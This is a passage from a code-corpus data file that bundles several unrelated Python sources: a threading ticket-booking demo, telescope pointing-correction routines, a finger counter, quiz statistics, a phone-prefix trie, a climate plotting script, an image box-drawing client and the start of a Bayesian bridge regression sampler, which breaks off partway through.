logging.info(\"Listening port %s\", options.port)\n IOLoop.instance().start()\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"81896770","text":"import threading \nimport time\nclass BookTicket:\n def __init__(self, total_seats):\n self.total_seats = total_seats\n self.l = threading.Lock()\n #self.l = threading.Seamphore()\n\n def processbooking(self, requestedSeats):\n print (threading.current_thread().getName())\n time.sleep(1)\n self.l.acquire()\n if self.total_seats+1 > requestedSeats:\n print (\"booking ticket\")\n print (\"confirming the seats\")\n print (\"print the ticket\")\n self.total_seats-= requestedSeats\n else:\n print (\"Sorry ! 
requested seats are not available\")\n \n \n print (self.total_seats)\n self.l.release()\n\nbt= BookTicket(total_seats= 10)\nt1 = threading.Thread(target=bt.processbooking, args=(3,))\nt2 = threading.Thread(target=bt.processbooking, args=(5,))\nt3 = threading.Thread(target=bt.processbooking, args=(2,))\nt4 = threading.Thread(target=bt.processbooking, args=(2,))\n\nt1.start()\nt2.start()\nt3.start()\nt4.start()\n\n\n\n\n","sub_path":"python_threading/bookticket.py","file_name":"bookticket.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92286800","text":"import numpy as np\nimport pylab as py\nimport pickle as pk\nimport os\nimport copy\nimport glob\nimport spt3g.pointing.pointing_tools as pt\nfrom spt3g import core\n\n'''\n This module contains functions for obtaining a list of pointing parameters \n to pass to the offline and/or online pointing model.\n'''\n\ndef grabAzTiltParams(input_files, tilts_dir='/poleanalysis/sptdaq/azTilts'):\n '''\n Extract tilt parameters from the nearest tilt ObsID to this observation's ObsID.\n '''\n a2 = None\n a3 = None\n for fname in input_files:\n for frame in core.G3File(fname):\n #Extract the obsID of the frame.\n if frame.type == core.G3FrameType.Observation:\n obsID = frame['ObservationID']\n\n #Now track down which tilt obsID should be matched to this.\n dirs = glob.glob(os.path.join(tilts_dir,'*'))\n obslist = [int(f.split('/')[-1]) for f in dirs]\n obslist.sort()\n thisID = np.where(obslist >= obsID)[0][0]\n tilt_obsID1 = obslist[thisID]\n tilt_obsID2 = obslist[thisID+1]\n\n #Which tilt_obsID is closest to obsID?\n tilt_obs = np.array([tilt_obsID1, tilt_obsID2])\n diffs = obsID - tilt_obs\n\n index = np.where(diffs == np.min(diffs))[0]\n\n tilt_obsID = tilt_obs[index]\n\n #Now load tilt information from the relevant g3 file.\n info = [f for f in core.G3File(os.path.join(tilts_dir,str(tilt_obsID[0]), '0001.g3'))][0]\n tiltHA = info['tiltHA']/core.G3Units.degrees\n tiltLat = info['tiltLat']/core.G3Units.degrees\n\n #Now map the tilt values to pointing model parameters.\n a2 = 0.88*tiltHA\n a3 = -0.88*tiltLat\n break\n \n #Break the for loop once we have a2,a3\n if a2 != None:\n break\n\n return a2, a3\n\n\n#Online Az model given raw Az/El and pointing parameters) \ndef CorrectedAz(az, el, a2, a3, a4, a5, az0, DET=0,\n flags=['az_tilts', 'el_tilts',\n 'flexure', 'collimation',\n 'refraction']):\n d_az = -az0\n\n if 'az_tilts' in flags:\n d_az += (a2* np.cos(az/core.G3Units.rad) +\\\n a3 *np.sin(az/core.G3Units.rad))*np.tan(el/core.G3Units.rad)\n\n if 'el_tilts' in flags:\n d_az += a4*np.tan(el/core.G3Units.rad)\n\n if 'collimation' in flags:\n d_az += - a5/np.cos(el/core.G3Units.rad)\n\n\n if 'thermolin' in flags:\n d_az += -DET*np.tan(el/core.G3Units.rad)\n \n return az + d_az\n\n\n#Online El model given raw Az/El and pointing parameters, and refraction)\ndef CorrectedEl(az, el, a0, a1, a2, a3, a6, refraction,\n DEL = 0.0,\n flags=['az_tilts', 'el_tilts', 'flexure',\n 'collimation', 'refraction']):\n\n d_el = 0.\n\n if 'flexure' in flags:\n d_el += a0*np.sin(el/core.G3Units.rad) + a1*np.cos(el/core.G3Units.rad)\n\n if 'az_tilts' in flags:\n d_el += -(a2*np.sin(az/core.G3Units.rad) - a3*np.cos(az/core.G3Units.rad))\n\n if 'collimation' in flags:\n d_el += -a6\n\n if 'refraction' in flags:\n d_el += -refraction\n\n if 'thermolin' in flags:\n d_el += -DEL\n\n return el + d_el\n\n@core.indexmod\nclass CorrectBoresightPointing(object):\n '''\n Makes two 
timestreams (Az, El) that apply offsets\n from a given pointing model to environmental data to the specified\n raw encoder timestreams. Interpolates over pointing dropouts by default.\n\n The usual model choices are 'OnlinePointingModel' and 'OfflinePointingModel'\n and can reference dictionaries of parameters in any frame type.\n\n flags: list of pointing model segments to turn on. Default is everything\n in online model (no thermolin corrections).\n '''\n def __init__(self,\n raw_az_key = 'RawBoresightAz', raw_el_key = 'RawBoresightEl',\n output = 'OnlineBoresight', model = 'OnlinePointingModel',\n flags = ['az_tilts', 'el_tilts', 'flexure', 'collimation',\n 'refraction']):\n # XXX: contrary to documentation, does no interpolation\n self.raw_az_key = raw_az_key\n self.raw_el_key = raw_el_key\n self.output = output\n self.model_key = model\n self.flags = flags\n\n self.model = None # Will be filled later\n\n def __call__(self, frame):\n # Try to cache the model, wherever it appears\n if self.model_key in frame:\n self.model = frame[self.model_key]\n\n # Otherwise, ignore non-scan frames\n if frame.type != core.G3FrameType.Scan:\n return\n\n # Now get model params\n a0, a1 = self.model['flexure'][0:2]\n a2, a3, a4 = self.model['tilts'][0:3]\n a5, a6 = self.model['fixedCollimation'][0:2]\n az0 = frame['TrackerPointing'].encoder_off_x[0]\n refraction = np.median(frame['TrackerPointing'].refraction)\n\n p = {'a0':a0, 'a1':a1, 'a2':a2, 'a3':a3, 'a4':a4,\n 'a5':a5, 'a6':a6, 'az0':az0, 'refraction':refraction}\n\n # And apply corrections\n if 'thermolin' in self.flags:\n l1 = np.median(frame['TrackerPointing'].linsens_avg_l1)\n l2 = np.median(frame['TrackerPointing'].linsens_avg_l2)\n r1 = np.median(frame['TrackerPointing'].linsens_avg_r1)\n r2 = np.median(frame['TrackerPointing'].linsens_avg_r2)\n\n lin_data = get_lin_sens(l1, l2, r1, r2)\n p_thermolin = thermo2pointing(frame['TrackerPointing'].scu_temp, \n lin_data)\n\n p['DET'] = p_thermolin['DET']\n p['DEL'] = p_thermolin['DEL']\n else:\n p['DET'] = 0.0\n p['DEL'] = 0.0\n\n corrected_az = CorrectedAz(frame[self.raw_az_key],\n\t\t\t\t frame[self.raw_el_key],\n p['a2'], p['a3'], p['a4'], \n p['a5'], p['az0'], p['DET'], \n flags=self.flags)\n corrected_el = CorrectedEl(frame[self.raw_az_key],\n\t\t\t\t frame[self.raw_el_key],\n p['a0'], p['a1'], p['a2'], \n p['a3'], p['a6'], p['refraction'], p['DEL'],\n flags=self.flags)\n\n frame[self.output + 'Az'] = corrected_az\n frame[self.output + 'El'] = corrected_el\n\n\ndef TestThermolin(frame):\n '''\n Gather DET and DEL corrections for a given observation.\n '''\n if frame.type == core.G3FrameType.Scan:\n p = extractOfflinePointingParameters(frame)\n l1 = np.median(frame['TrackerPointing'].linsens_avg_l1)\n l2 = np.median(frame['TrackerPointing'].linsens_avg_l2)\n r1 = np.median(frame['TrackerPointing'].linsens_avg_r1)\n r2 = np.median(frame['TrackerPointing'].linsens_avg_r2)\n\n lin_data = get_lin_sens(l1, l2, r1, r2)\n p_thermolin = thermo2pointing(frame['TrackerPointing'].scu_temp, \n lin_data)\n\n p['DET'] = p_thermolin['DET']\n p['DEL'] = p_thermolin['DEL']\n\n frame['DET'] = core.G3Double(p['DET'])\n frame['DEL'] = core.G3Double(p['DEL'])\n \n\n\n#----------------------------------------------------------------------------------------\n#Below is code used to calculate collimation corrections based on scu temperature sensor\n#and yoke arm metrology readings.\n#This may or may not get replaced with the thermolin code RK wrote for use with 
EHT.\n#----------------------------------------------------------------------------------------\ndef get_lin_sens(l1, l2, r1, r2):\n \"\"\"\n Translated from the IDL get_lin_sens.pro written by RK.\n\n The purpose of this function is to return the linear sensor and thermometry sensor data\n from a given time window. Linearly interpolate over dropouts in the \n sensor data.\n \n INPUTS\n date: Array of dates.\n\n OUTPUTS\n S: a dictionary with the following substructures:\n 'utc': The 100 Hz UTC.\n 'l1': The 100 Hz L1 length, in mm.\n 'l2': The 100 Hz L2 length, in mm.\n 'r1': The 100 Hz R1 length, in mm.\n 'r2': The 100 Hz R2 length, in mm.\n 'del': The 100 Hz elevation correction, in arcseconds.\n 'daz': The 100 Hz azimuth correction, in arcseconds.\n 'det': The 100 Hz elevation tilt correction, in arcseconds.\n 'temp': The thermometry data, which is an array with [nthermos, nsamples].\n\n Translated: October 2012, JWH.\n Originally Written: April 2008, RK.\n Modifications: Take linear sensor data in place of the 'date' input. 7 Dec 2012, SH\n \"\"\"\n\n #Yoke dimensions in mm.\n Rs = 1652.\n Rh = 3556.\n Ry = 6782.\n\n #Calculate corrections in arcsec.\n DEL = (1./(2.*Rs))*(l2 - l1 + r2 - r1)*(3600.*180./np.pi)\n DAZ = (Rh/(Ry*Rs))*(l1 - l2 - r1 + r2)*(3600.*180./np.pi)\n DET = (1./(2.*Ry))*(r1 + r2 - l1 - l2)*(3600.*180./np.pi)\n\n #Subtract medians calculated from RCW38 observations.\n DAZ -= 0.0 #38.7\n DEL -= 0.0 #27.6\n DET -= 0.0 #18.6\n\n #Fill the output dictionary.\n s = {#'utc':utc, \n 'l1':l1, 'l2':l2, 'r1':r1, 'r2':r2,\n 'del':DEL, 'daz':DAZ, 'det':DET}\n\n return s\n\n\ndef thermo2pointing(scu_temp, this_lin, \n thermometry_config_file='thermometer_pointing_coefficients',\n nointerp=True):\n \"\"\"\n The purpose of this function is to provide pointing corrections DET and DEL, given an\n input array of structure thermometry and/or linear sensor data. The model is just linear \n in the thermometry + linear sensors. The coefficients for the model are stored in an \n external common txt file.\n\n INPUTS:\n scu_temp_in: the array of thermometry + linear sensor data. It has\n dimensions of (63, nsamples) where there are 60 thermometers\n and 3 linear sensors. The thermometry should be raw (degrees C).\n\n OUTPUTS:\n s - a dictionary with the following fields:\n DET: the DET (elevation axis tilt) correction, in arcseconds.\n DEL: the DEL (plain old elevation) correction, in arcseconds.\n\n\n EXCEPTIONS\n ValueError if the config file doesn't match the size of the scu_temp register data. 
\n\n Translated to python from the original IDL written by RK, Jan 2009.\n Translated by JWH October 2012.\n \"\"\"\n #scu_temp/=core.G3Units.K + 273.15\n\n scu_temp = np.median(np.reshape(scu_temp, (len(scu_temp)/60, 60)), axis=0)\n scu_temp = scu_temp/core.G3Units.K + 273.15\n\n scu_temp = np.hstack([scu_temp, this_lin['daz'], this_lin['del'], this_lin['det']])\n\n scu_temp = np.array([scu_temp]).T\n\n # Read in a config file that contains the coefficients for going from\n # structure temperatures to pointing offsets DET and DEL.\n index, det_coeff, del_coeff, neighbors1, neighbors2 = readThermoConfig()\n\n nsamples = scu_temp.shape[1]\n nthermo = scu_temp.shape[0]\n if nthermo != len(det_coeff)-1 or nthermo != len(del_coeff)-1:\n raise ValueError('# of thermometers in scu_temp does not match # of coefficients')\n\n #Interpolate over dropouts\n npts = nsamples\n thermo_zero = -200.0\n if nointerp==True and nsamples > 1:\n for i in range(nthermo-3):\n whnodrop1 = np.nonzero((scu_temp[i] != thermo_zero) &\n (scu_temp[i] != 0.0) &\n (scu_temp[i] > -150.) &\n (scu_temp[i] < 40.))[0]\n nnodrop = len(whnodrop1)\n if nnodrop < npts/2.:\n continue\n thisdata = scu_temp[i]\n thisdata = pt.interp_over_dropouts(thisdata, whnodrop=whnodrop1)\n scu_temp[i] = thisdata\n\n #The thermometer indexed in IDL by i=40 begain to have problems in 2011.\n #The cause of these problems are unknown, but basically the temperatures\n #that are recorded are crazy. This can screw up the pointing, since the \n #offline pointing model depends on the telescope temperatures. So if it's\n #2011 or later, and the i=40 thermometer looks crazy, let's replace its data\n #with that of a nearby thermometer, i=42.\n if (np.abs(np.median(scu_temp[40]) - np.median(scu_temp[42])) > 10.):\n scu_temp[40] = scu_temp[42]\n\n # Look through each thermometer, checking to see if there are any\n # which are still equal to the \"thermometer zero\" value, typically\n # -200.0 C, which were not interpolated over because there's no good\n # data to use for the interpolation. For these thermometers we want\n # to replace their output with that of their \"neighbors\", where \n # neighbor is defined as a thermometer that historically had a \n # similar temperature.\n scu_tempo = scu_temp.copy()\n for i in range(nthermo-3):\n this_temp = np.array(scu_temp[i]).reshape(len(scu_temp[i]))\n wh_zero = np.nonzero(this_temp == thermo_zero)[0]\n n_zero = len(wh_zero)\n if n_zero > 0:\n #This thermometer is returning the \"zero\" value. 
Replace its\n #data from that from its closest possible neighbor with similar data.\n this_n1 = neighbors1[i]\n this_temp_n = scu_temp[int(this_n1)]\n wh_zero_n = np.nonzero(this_temp_n == thermo_zero)[0]\n n_zero_n = len(wh_zero_n) \n if n_zero_n == 0:\n scu_temp[i] = this_temp_n\n else:\n this_n2 = neighbors2[i]\n this_temp_n = np.array(scu_temp[this_n2])\n wh_zero_n = np.nonzero(this_temp_n == thermo_zero)[0]\n n_zero_n = len(wh_zero_n)\n if n_zero_n == 0:\n scu_temp[i] = this_temp_n\n else:\n if (i<=25) or (i >= 40):\n pass\n wh_not_zero = np.nonzero(scu_tempo != thermo_zero)[0]\n n_not_zero = len(wh_not_zero)\n wh_not_zero = 0.\n if n_not_zero > 0:\n scu_temp[i] = ( np.zeros(len(scu_temp[i])) + \n np.median(scu_tempo[scu_tempo != thermo_zero]) )\n\n #Convert temps to Kelvin.\n scu_temp[0:60,0] += 273.15\n\n #Restructure the coefficients\n det_dc = det_coeff[-1]\n del_dc = del_coeff[-1]\n det_coeff = np.matrix(det_coeff[:-1])\n del_coeff = np.matrix(del_coeff[:-1])\n scu_temp = np.matrix(scu_temp)\n\n #Subtract off the median (calculated from 2014 RCW38 obs) so we have mean zero corrections.\n DET = np.array(det_coeff*scu_temp + det_dc) - 0.0 #-20.2\n DEL = np.array(del_coeff*scu_temp + del_dc) - 0.0 #-7.0\n\n\n #Return corrections in units of degrees.\n return {'DET':DET[0][0]/3600., 'DEL':DEL[0][0]/3600.}\n\n\ndef readThermoConfig(config_file='thermometer_pointing_coefficients.txt'):\n '''\n Read in thermometer pointing coefficients calculated originally by RK for SPT-SZ.\n It's probably a good idea to update these coefficients...\n '''\n d = open(os.path.join(os.path.dirname(os.path.realpath(__file__)), config_file), 'r').read().split('\\n')[:-1]\n \n index = []\n det_coeff = []\n del_coeff = []\n neighbors1 = []\n neighbors2 = []\n\n for i in range(len(d)):\n index.append(int(float(d[i].split(' ')[0])))\n det_coeff.append(float(d[i].split(' ')[1]))\n del_coeff.append(float(d[i].split(' ')[2]))\n neighbors1.append(int(float(d[i].split(' ')[3])))\n neighbors2.append(int(float(d[i].split(' ')[4])))\n\n return index, det_coeff, del_coeff, neighbors1, neighbors2\n\n@core.usefulfunc\ndef OfflinePointingParamsAtTime(t, config_files):\n '''\n Read SPTpol-style configuration text files and interpolate the values\n into an appropriately-formatted G3MapVectorDouble that can be placed into a\n frame for use by CorrectBoresightPointing.\n\n t should be either a G3Time or a string that the G3Time constructor can\n interpret.\n '''\n\n params = {}\n for fname in config_files:\n with open(fname, 'r') as f:\n # Can't figure out a way to parse these with numpy.loadtxt :(\n for line in f.readlines():\n if len(line[0].strip()) == 0:\n continue\n if line[0] == '#' and line[1] == '#':\n headers = line[2:].split()\n elif line.split()[0] == '#mjd':\n headers = line[1:].split()\n elif line[0] == '#':\n continue\n elif line.startswith('VALIDITY'):\n continue\n else:\n fields = {headers[i]: float(j) for i, j in\n enumerate(line.split())}\n if fields['mjd'] not in params:\n params[fields['mjd']] = {}\n params[fields['mjd']].update(fields)\n\n keys = {k for v in params.values() for k in v if k != 'mjd'}\n\n if isinstance(t, str):\n t = core.G3Time(t)\n desiredmjd = t.mjd\n p_at_t = {}\n\n for k in keys:\n mjd = []\n vals = []\n for datum in params.values():\n if k not in datum:\n continue\n mjd.append(datum['mjd'])\n vals.append(datum[k])\n p_at_t[k] = np.interp([desiredmjd], mjd, vals)[0]\n\n out = core.G3MapVectorDouble()\n if 'a0' in p_at_t:\n out['flexure'] = core.G3VectorDouble([p_at_t['a0'], 
p_at_t['a1']])\n if 'a2' in p_at_t:\n out['tilts'] = core.G3VectorDouble([p_at_t['a2'], p_at_t['a3'], p_at_t['a4']])\n if 'a5' in p_at_t:\n out['fixedCollimation'] = core.G3VectorDouble([p_at_t['a5'], p_at_t['a6']])\n if 'az0' in p_at_t:\n out['az0'] = core.G3VectorDouble([p_at_t['az0']])\n\n return out\n\n","sub_path":"pointing/offline_pointing.py","file_name":"offline_pointing.py","file_ext":"py","file_size_in_byte":17877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"609346333","text":"import HandTrackingModule as htm\r\n\r\nclass fingerCounter():\r\n def __init__(self):\r\n # Calls the HandTrackingModule and sets the tipIds to the tips of the fingers' ids\r\n self.detector = htm.handDetector(maxHands=1)\r\n self.tipIds = [4, 8, 12, 16, 20]\r\n\r\n def getFingerCount(self, img, draw=True, thumb_con=-10):\r\n \r\n # Get the finger positions and the img\r\n lmList,img = self.detector.findPosition(img, draw=True if draw == True else False)\r\n\r\n fingers = []\r\n if len(lmList) != 0:\r\n fingers = []\r\n\r\n # Thumb\r\n # Checks if the x coordinate of tip of the thumb is smaller than the x coordinate of the tip of the little\r\n # finger. its used to check if my hand is facing towards the cam or not\r\n if lmList[self.tipIds[0]][1] > lmList[self.tipIds[4]][1]:\r\n\r\n # If the hand is not facing the camera it checks if the tip of the thumb's x coordinate - bone under\r\n # the tip of the thumb's x coordinate is smaller than 15\r\n if lmList[self.tipIds[0]-1][1] - lmList[self.tipIds[0]][1] < thumb_con:\r\n fingers.append(1)\r\n else:\r\n fingers.append(0)\r\n else:\r\n\r\n # If the hand is facing the camera it checks if the tip of the thumb's x coordinate - bone under\r\n # the tip of the thumb's x coordinate is bigger than 15\r\n if lmList[self.tipIds[0]-1][1] - lmList[self.tipIds[0]][1] > thumb_con:\r\n fingers.append(1)\r\n else:\r\n fingers.append(0)\r\n\r\n # 4 Fingers\r\n for id in range(1, 5):\r\n try:\r\n # If the y of tip of the finger is smaller than the lowest bone of the finger\r\n if lmList[self.tipIds[id]][2] < lmList[self.tipIds[id] - 2][2]:\r\n fingers.append(1)\r\n else:\r\n fingers.append(0)\r\n except IndexError:\r\n pass\r\n\r\n # Return the finger array and the image array\r\n return (fingers,img)\r\n","sub_path":"Pyhton/FingerCounterModule.py","file_name":"FingerCounterModule.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"534239304","text":"import csv\nimport re\nimport datetime\nfrom collections import defaultdict, namedtuple\n\nDATA = 'days/04-06-collections/D6/BIO1101-intra.csv'\n\nStudent = namedtuple('Student', 'time score question')\n\ndef get_score_by_question():\n \"\"\"Extracts all students form the datafile. 
For each question, get\n a list of all score on 100.\n\n Args:\n file (str): datafile\n Return:\n dictionary\n \"\"\"\n headers = []\n scores_question = defaultdict(list)\n mean_score_by_question = {}\n with open(DATA, encoding='utf-8') as f:\n csvin = csv.reader(f)\n headers = next(csvin)\n with open(DATA, encoding='utf-8') as f:\n for line in csv.DictReader(f):\n for h in headers:\n try:\n q = re.search('^Q..[0-9]{1,2}',h).group(0)\n brut = float(line[h])\n t = float(h[-4:])\n rel_score = brut/t\n except (ValueError, AttributeError):\n continue\n scores_question[q].append(rel_score)\n for q, s in scores_question.items():\n mean_score_by_question[q] = round(sum(s)/len(s)*100, 2)\n return {key: value for key, value in sorted(mean_score_by_question.items(), key=lambda item: item[1])}\n\n\ndef time_spent():\n liste_temps = []\n with open(DATA, encoding='utf-8') as f:\n for line in csv.DictReader(f):\n try:\n t = datetime.datetime.strptime(line['Temps utilisé'], '%H heures %M min').time()\n secondes = (t.hour * 60 + t.minute) * 60\n except ValueError:\n continue\n liste_temps.append(secondes)\n print(datetime.timedelta(seconds=sum(liste_temps)/len(liste_temps)))\n\n\nif __name__ == \"__main__\":\n scores_by_question = get_score_by_question()\n for q, s in scores_by_question.items():\n print(f'{q}\\t{s}')\n time_spent()","sub_path":"days/04-06-collections/D6/intra_stats.py","file_name":"intra_stats.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"532847139","text":"#전화번호 목록\nimport sys\n\nclass node:\n def __init__(self,key,data=None):\n self.key = key\n self.data = data\n self.child = {}\n\nclass trie:\n def __init__(self):\n self.head = node(None)\n\n def insert(self,string):\n cur_node = self.head\n\n for char in string:\n if char not in cur_node.child:\n cur_node.child[char] = node(char)\n cur_node = cur_node.child[char]\n if cur_node.data != None:\n return False\n\n cur_node.data = string\n if cur_node.child:\n return False\n return True\n\nN = int(sys.stdin.readline())\n\nfor _ in range(N):\n trie1 = trie()\n M = int(sys.stdin.readline())\n ans = True\n for _ in range(M):\n A = str(sys.stdin.readline().rstrip())\n temp = trie1.insert(A)\n if temp == False:\n ans = False\n if ans:\n print(\"YES\")\n else:\n print(\"NO\")\n","sub_path":"Python/7주차_트라이/정글_7_5052.py","file_name":"정글_7_5052.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"210257528","text":"#!/usr/bin/env python\n\n\"\"\"\nFor each of the OzFlux/FLUXNET2015 sites, plot the TXx and T-4 days\nQle and bowen ratio\n\nThat's all folks.\n\"\"\"\n\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (20.04.2018)\"\n__email__ = \"mdekauwe@gmail.com\"\n\nimport os\nimport sys\nimport glob\nimport netCDF4 as nc\nimport numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport re\nimport constants as c\n\ndef main(fname):\n\n plot_dir = \"plots\"\n if not os.path.exists(plot_dir):\n os.makedirs(plot_dir)\n\n df = pd.read_csv(fname)\n df = df[df.pft == \"EBF\"]\n ignore_sites = [\"Tumbarumba\"]\n for site in ignore_sites:\n df = df.drop( df[(df.site == site)].index )\n #width = 12.0\n #height = width / 1.618\n #print(width, height)\n #sys.exit()\n width = 14\n height = 10\n fig = plt.figure(figsize=(width, height))\n fig.subplots_adjust(hspace=0.05)\n fig.subplots_adjust(wspace=0.05)\n 
plt.rcParams['text.usetex'] = False\n plt.rcParams['font.family'] = \"sans-serif\"\n plt.rcParams['font.sans-serif'] = \"Helvetica\"\n plt.rcParams['axes.labelsize'] = 14\n plt.rcParams['font.size'] = 14\n plt.rcParams['legend.fontsize'] = 10\n plt.rcParams['xtick.labelsize'] = 14\n plt.rcParams['ytick.labelsize'] = 14\n\n\n count = 0\n sites = np.unique(df.site)\n for site in sites:\n site_name = re.sub(r\"(\\w)([A-Z])\", r\"\\1 \\2\", site)\n ax = fig.add_subplot(3,3,1+count)\n\n df_site = df[df.site == site]\n events = int(len(df_site)/4)\n\n cnt = 0\n for e in range(0, events):\n\n from scipy import stats\n x = df_site[\"temp\"][cnt:cnt+4]\n y = df_site[\"GPP\"][cnt:cnt+4]\n slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)\n #print(site, slope, p_value)\n if slope < 0.0 and p_value <= 0.05:\n ax.plot(df_site[\"temp\"][cnt:cnt+4], df_site[\"GPP\"][cnt:cnt+4],\n label=site, ls=\"-\", marker=\"o\", zorder=100)\n elif slope < 0.0 and p_value > 0.05:\n ax.plot(df_site[\"temp\"][cnt:cnt+4], df_site[\"GPP\"][cnt:cnt+4],\n label=site, ls=\"-\", marker=\"o\", color=\"lightgrey\",\n zorder=1)\n cnt += 4\n\n if count == 0:\n ax.set_ylabel(\"GPP (g C m$^{-2}$ d$^{-1}$)\", position=(0.5, 0.0))\n if count == 4:\n #ax.set_xlabel('Temperature ($^\\circ$C)', position=(1.0, 0.5))\n ax.set_xlabel('Temperature ($^\\circ$C)')\n\n if count < 3:\n plt.setp(ax.get_xticklabels(), visible=False)\n\n if count != 0 and count != 3:\n plt.setp(ax.get_yticklabels(), visible=False)\n\n props = dict(boxstyle='round', facecolor='white', alpha=1.0,\n ec=\"white\")\n ax.text(0.04, 0.95, site_name,\n transform=ax.transAxes, fontsize=14, verticalalignment='top',\n bbox=props)\n\n from matplotlib.ticker import MaxNLocator\n ax.yaxis.set_major_locator(MaxNLocator(4))\n ax.set_ylim(0, 15)\n ax.set_xlim(15, 50)\n count += 1\n\n\n ofdir = \"/Users/mdekauwe/Dropbox/fluxnet_heatwaves_paper/figures/figs\"\n fig.savefig(os.path.join(ofdir, \"all_events_GPP_CABLE.pdf\"),\n bbox_inches='tight', pad_inches=0.1)\n #plt.show()\n\nif __name__ == \"__main__\":\n\n data_dir = \"outputs/\"\n fname = \"ozflux_all_events_CABLE.csv\"\n fname = os.path.join(data_dir, fname)\n main(fname)\n","sub_path":"src/plot_GPP_at_all_events_above_Tthreh_CABLE.py","file_name":"plot_GPP_at_all_events_above_Tthreh_CABLE.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"635129462","text":"import io\r\nimport os\r\nimport sys\r\nfrom PIL import Image, ImageDraw, ExifTags, ImageColor\r\nfrom paramiko_conn import connection\r\n\r\ndef detect_lines(photo):\r\n\r\n fill_red='#ff0000'\r\n line_width=10\r\n\r\n\r\n image = Image.open(open(photo,'rb'))\r\n stream = io.BytesIO()\r\n image.save(stream, format=image.format) \r\n image_binary = stream.getvalue()\r\n imgWidth, imgHeight = image.size \r\n draw = ImageDraw.Draw(image) \r\n\r\n ox = connection(photo)\r\n for box in ox: \r\n left = imgWidth * box['Left']\r\n top = imgHeight * box['Top']\r\n width = imgWidth * box['Width']\r\n height = imgHeight * box['Height']\r\n points = (\r\n (left,top),\r\n (left + width, top),\r\n (left + width, top + height),\r\n (left , top + height),\r\n (left, top)\r\n )\r\n draw.line(points, fill=fill_red, width=line_width)\r\n\r\n image.show()\r\n\r\ndef main():\r\n\r\n photo = sys.argv[1]\r\n detect_lines(photo)\r\n\r\nif __name__ == \"__main__\":\r\n 
main()\r\n","sub_path":"client-side/draw_line.py","file_name":"draw_line.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"468169326","text":"import numpy as np\nimport scipy as sp\nimport scipy.stats\nimport scipy.linalg\nimport scipy.sparse\nimport math\nimport time\nimport pdb\nfrom .util.simple_warnings import warn_message_only\nfrom .random import BasicRandom\nfrom .reg_coef_sampler import SparseRegressionCoefficientSampler\nfrom .design_matrix import SparseDesignMatrix, DenseDesignMatrix\n\n\nclass BayesBridge():\n\n def __init__(self, y, X, n_trial=None, model='linear',\n n_coef_without_shrinkage=0, prior_sd_for_unshrunk=float('inf'),\n add_intercept=True):\n \"\"\"\n Params\n ------\n y : vector\n X : numpy array or scipy sparse matrix\n n_trial : vector\n Used for the logistic model for binomial outcomes.\n model : str, {'linear', 'logit'}\n n_coef_without_shrinkage : int\n The number of predictors whose coefficients are to be estimated\n without any shrinkage (a.k.a. regularization).\n prior_sd_for_unshrunk : float, numpy array\n If an array, the length must be the same as n_coef_without_shrinkage.\n \"\"\"\n\n # TODO: Make each MCMC run more \"independent\" i.e. not rely on the\n # previous instantiation of the class. The initial run of the Gibbs\n # sampler probably depends too much the stuffs here.\n\n if not (np.isscalar(prior_sd_for_unshrunk)\n or n_coef_without_shrinkage == len(prior_sd_for_unshrunk)):\n raise ValueError('Invalid array size for prior sd.')\n\n if add_intercept:\n X, n_coef_without_shrinkage, prior_sd_for_unshrunk = \\\n self.add_intercept(X, n_coef_without_shrinkage, prior_sd_for_unshrunk)\n\n if model == 'logit':\n if n_trial is None:\n self.n_trial = np.ones(len(y))\n warn_message_only(\n \"The numbers of trials were not specified. 
The binary \"\n \"outcome is assumed.\"\n )\n else:\n self.n_trial = n_trial\n\n if np.isscalar(prior_sd_for_unshrunk):\n self.prior_sd_for_unshrunk = prior_sd_for_unshrunk \\\n * np.ones(n_coef_without_shrinkage)\n else:\n self.prior_sd_for_unshrunk = prior_sd_for_unshrunk\n self.n_unshrunk = n_coef_without_shrinkage\n self.model = model\n self.y = y\n self.X = SparseDesignMatrix(X) if sp.sparse.issparse(X) else DenseDesignMatrix(X)\n self.n_obs = X.shape[0]\n self.n_pred = X.shape[1]\n self.prior_type = {}\n self.prior_param = {}\n self.set_default_priors(self.prior_type, self.prior_param)\n self.rg = BasicRandom()\n\n def add_intercept(self, X, n_coef_without_shrinkage, prior_sd_for_unshrunk):\n if sp.sparse.issparse(X):\n hstack = sp.sparse.hstack\n else:\n hstack = np.hstack\n X = hstack((np.ones((X.shape[0], 1)), X))\n n_coef_without_shrinkage += 1\n if not np.isscalar(prior_sd_for_unshrunk):\n prior_sd_for_unshrunk = np.concatenate((\n [float('inf')], prior_sd_for_unshrunk\n ))\n return X, n_coef_without_shrinkage, prior_sd_for_unshrunk\n\n def set_default_priors(self, prior_type, prior_param):\n prior_type['global_shrinkage'] = 'jeffreys'\n # prior_type['global_shrinkage'] = 'half-cauchy'\n # prior_param['global_shrinkage'] = {'scale': 1.0}\n return prior_type, prior_param\n\n def gibbs_additional_iter(\n self, mcmc_output, n_iter, merge=False, deallocate=False):\n \"\"\"\n Continue running the Gibbs sampler from the previous state.\n\n Parameter\n ---------\n mcmc_output : the output of the 'gibbs' method.\n \"\"\"\n\n if merge and deallocate:\n warn_message_only(\n \"To merge the outputs, the previous one cannot be deallocated.\")\n deallocate = False\n\n self.rg.set_state(mcmc_output['_random_gen_state'])\n\n init = {\n key: np.take(val, -1, axis=-1).copy()\n for key, val in 